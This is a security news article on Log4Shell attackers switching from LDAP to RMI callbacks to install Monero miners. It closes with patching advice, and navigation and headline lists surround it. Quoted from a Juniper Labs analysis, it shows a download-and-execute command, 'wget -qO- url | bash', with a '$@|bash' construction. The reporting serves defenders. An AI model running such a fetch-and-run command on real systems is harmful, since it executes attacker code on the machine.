Microsoft December 2021 Patch Tuesday fixes 6 zero-days, 67 flaws
New ransomware now being deployed in Log4Shell attacks
Microsoft fixes Windows AppX Installer zero-day used by Emotet
Log4j vulnerability now used by state-backed hackers, access brokers
Logistics giant warns of BEC emails following ransomware attack
Conti ransomware uses Log4j bug to hack VMware vCenter servers
All Log4j, logback bugs we know so far and why you MUST ditch 2.15
Break in to the world of ethical hacking with this huge course bundle
Qualys BrowserCheck
Junkware Removal Tool
How to remove the PBlock+ adware browser extension
Remove the Search Redirect
Remove the Search Redirect
Remove the Search Redirect
Remove Security Tool and SecurityTool (Uninstall Guide)
How to remove Antivirus 2009 (Uninstall Instructions)
How to Remove WinFixer / Virtumonde / Msevents / Trojan.vundo
How to remove Google Redirects or the TDSS, TDL3, or Alureon rootkit using TDSSKiller
Locky Ransomware Information, Help Guide, and FAQ
CryptoLocker Ransomware Information Guide and FAQ
CryptorBit and HowDecrypt Information Guide and FAQ
CryptoDefense and How_Decrypt Ransomware Information Guide and FAQ
How to make the Start menu full screen in Windows 10
How to install the Microsoft Visual C++ 2015 Runtime
How to open an elevated PowerShell Admin prompt in Windows 10
How to Translate a Web Page in Google Chrome
How to start Windows in Safe Mode
How to remove a Trojan, Virus, Worm, or other Malware
How to show hidden files in Windows 7
How to see hidden files in Windows
IT Certification Courses
Gear + Gadgets
Some threat actors exploiting the Apache Log4j vulnerability have switched from LDAP callback URLs to RMI or even used both in a single request for maximum chances of success.
This shift is a notable development in the ongoing attack and one that defenders need to be aware of when trying to secure all potential vectors.
For now, this trend was observed by threat actors looking to hijack resources for Monero mining, but others could adopt it at any time.
Most attacks targeting the Log4j “Log4Shell” vulnerability have been through the LDAP (Lightweight Directory Access Protocol) service.
The switch to RMI (Remote Method Invocation) API seems counter-intuitive at first, considering that this mechanism is subject to additional checks and constraints, but that’s not always the case.
Some JVM (Java Virtual Machine) versions do not feature stringent policies, and as such, RMI can sometimes be a more effortless channel to achieving RCE (remote code execution) than LDAP.
Moreover, LDAP requests are now solidified as part of the infection chain and are more tightly monitored by defenders.
For example, many IDS/IPS tools are currently filtering requests with JNDI and LDAP, so there’s a chance that RMI may be ignored at this point.
In some cases, Juniper saw both RMI and LDAP services in the same HTTP POST request.
However, for all actors attempting to abuse the Log4Shell vulnerability, the goal remains the same – sending an exploit string to be processed by the vulnerable Log4j server, leading to code execution on the target.
The above attack causes a bash shell to be spawned that downloads a shell script from a remote server.
“This code invokes a bash shell command via the JavaScript scripting engine, using the construction “$@|bash” to execute the downloaded script,” explains the Juniper Labs report
“During the execution of this command, the bash shell will pipe the attacker’s commands to another bash process: “wget -qO- url | bash”, which downloads and executes a shell script on the target machine.”
In the attacks seen by Juniper Labs, threat actors are interested in mining Monero on the compromised servers and present it as an almost innocuous activity that “ain’t going to harm anyone else.”
The miner targets x84_64 Linux systems and adds persistence via the cron subsystem.
Although most attacks so far have targeted Linux systems, CheckPoint reports that its analysts discovered the first Win32 executable that leverages Log4Shell, called ‘StealthLoader.’
The only feasible way to defend against what has become one of the most impactful vulnerabilities in recent history is to upgrade Log4j to version 2.16.0.
Additionally, admins should keep a close eye on Apache’s security section for new version announcements and apply them immediately.
For mitigation guidance and complete technical information resources, check out CISA’s detailed page on Log4Shell.
There’s an extensive list of products affected by CVE-2021-44228, and a list with vendor-supplied advisories is constantly updated on this GitHub repository
Finally, if you notice suspicious activity on your systems, consider reporting it to the FBI or CISA, who are working feverishly to contain the damage and remediate the situation.
All Log4j, logback bugs we know so far and why you MUST ditch 2.15
Log4j: List of vulnerable products and vendor advisories
Hackers start pushing malware in worldwide Log4Shell attacks
Researchers release ‘vaccine’ for critical Log4Shell vulnerability
Conti ransomware uses Log4j bug to hack VMware vCenter servers
Not a member yet? Register Now
Lenovo laptops vulnerable to bug allowing admin privileges
Large-scale phishing study shows who bites the bait more often
To receive periodic updates and news from BleepingComputer, please use the form below.
Terms of Use Privacy PolicyEthics Statement
Copyright @ 2003 – 2021 Bleeping Computer® LLC – All Rights Reserved
Not a member yet? Register Now
Read our posting guidelinese to learn what content is prohibited.


You May Also Like

The Week in Ransomware – November 19th 2021 – Targeting Conti

Microsoft: Office 365 will boost default protection for all usersMicrosoft increases Windows…

BlackMatter ransomware moves victims to LockBit after shutdown

CISA orders federal agencies to fix hundreds of exploited security flawsUS sanctions…

DHS announces 'Hack DHS' bug bounty program for vetted researchers

Microsoft December 2021 Patch Tuesday fixes 6 zero-days, 67 flawsBugs in billions…

STOP Ransomware vaccine released to block encryption

Grafana fixes zero-day vulnerability after exploits spread over TwitterGoogle disrupts massive Glupteba…